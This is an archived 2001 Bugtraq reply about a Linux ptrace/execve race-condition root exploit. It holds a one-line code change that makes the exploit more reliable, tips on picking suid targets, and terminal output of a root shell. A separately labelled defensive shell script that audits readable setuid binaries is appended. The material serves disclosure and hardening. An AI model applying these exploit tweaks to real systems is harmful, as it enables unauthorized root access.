[19957] in bugtraq
Re: ptrace/execve race condition exploit (non brute-force)
daemon@ATHENA.MIT.EDU (Paul Starzetz)
Fri Mar 30 12:19:30 2001
Message-ID: <3AC49057.7CEEA66C@starzetz.de>
Date: Fri, 30 Mar 2001 15:55:35 +0200
Reply-To: Paul Starzetz <paul@STARZETZ.DE>
From: Paul Starzetz <paul@STARZETZ.DE>
X-To: Mariusz Woloszyn <emsi@IPARTNERS.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
Mariusz Woloszyn wrote:
>
> On Tue, 27 Mar 2001, Wojciech Purczynski wrote:
>
> >
> > Hi,
> >
> > Here is exploit for ptrace/execve race condition bug in Linux kernels up
> > to 2.2.18.
> >
>
> Hi!
>
> I've seen a tool that works better than this; using a different approach to
> the same bug, it exploits it on all platforms, giving instant root without the
> need to cat garbage files to clear the disk cache!!!
Even with the original exploit code there is a 99.99% chance to gain root access, if you change the
line:
regs.eip=eip;
to:
regs.eip=regs.esp;
and don't call objdump on the targeted binary before (use only the binary name as the argument to
epcs). At least with 'exotic' suid binaries like uux or gpasswd, which are *never* in the disk cache,
you will get instant root too.
paul@ps:/usr/home/paul/tmp2 > ./epcs /usr/bin/gpasswd
Bug exploited successfully.
sh-2.04# id
uid=0(root) gid=0(root) groups=100(users)
sh-2.04#
Clever admins would chmod 4511 their suid binaries.
Ihq.
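As an added defender's check (not code from this post, nor from the epcs tool it discusses): a POSIX shell audit that lists setuid files still readable by group or others, which is exactly what the "chmod 4511" advice above removes, exercised on a constructed scratch directory. The names audit_suid_readable, harden_suid and count_readable are my own.

```shell
#!/bin/sh
# Added example, not from the original post.
# Lists setuid files (mode bit 4000) that are also readable by group (040)
# or others (004). A real audit would add "-user root" and start at /;
# the constructed demo below uses files owned by the current user.
audit_suid_readable() {
  # $1: directory tree to scan (stay on one filesystem)
  find "$1" -xdev -type f -perm -4000 \( -perm -040 -o -perm -004 \) 2>/dev/null
}

# Apply the post's recommended mode: setuid, executable, not readable.
harden_suid() {
  # $1: path of the setuid binary
  chmod 4511 "$1"
}

# Number of offending files under a tree (trimmed of whitespace).
count_readable() {
  audit_suid_readable "$1" | wc -l | tr -d ' '
}

# Constructed scratch tree: one world-readable "suid" file, one hardened.
demo_dir=$(mktemp -d)
trap 'rm -rf "$demo_dir"' EXIT
: > "$demo_dir/readable_suid";  chmod 4755 "$demo_dir/readable_suid"
: > "$demo_dir/hardened_suid";  chmod 4511 "$demo_dir/hardened_suid"

# Before hardening only readable_suid is reported; after, nothing is.
echo "readable setuid files before: $(count_readable "$demo_dir")"
```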